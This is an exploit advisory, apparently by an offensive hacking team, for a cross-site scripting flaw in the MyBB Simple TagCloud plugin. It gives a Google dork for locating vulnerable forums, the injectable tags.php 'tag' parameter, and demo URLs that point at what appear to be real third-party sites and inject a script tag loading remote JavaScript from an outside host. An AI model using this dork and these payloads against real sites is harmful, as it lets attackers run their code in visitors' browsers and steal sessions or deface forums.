[+] Exploit Title: MyBb simple TagCloud Plugin XSS Vulnerability
[+] Discovered By: Offensive
[+] Author: Attacker Security Team [http://attacker-team.org]
[+] Find : 14/7/2013
[+] public date: 12/1/2014
[+] Category: WebApp
[+] Google Dork: intext:Simple TagCloud Plugin by Kupo v 0.9a
[+] Tested On: Windows
[+] Site: Attacker-team.org
#######################################################################################
# Note :
# Its a XSS Vulnerability of MyBb simple TagCloud Plugin
# exploit:
# http://Site.com/{path}/tags.php?tag=[XSS]
########################################################################################
+Demo:
[*] http://bmwX-diag.pl/tags.php?tag="><script src=//msdesigner.ir/dir/ex.htm></script>
[*] forum.khoXderzae.com/tags.php?tag="><script src=//msdesigner.ir/dir/ex.htm></script>
########################################################################################
Greets to: Rooter - Hex - Hamoon pars - Anonymous
Attacker Security Team Members: Virangar , MR.MOJTABA , D@ni , Gold___Hat , ArmiN_C , Alireza_rusher
Thanks To : Medrik
########################################################################################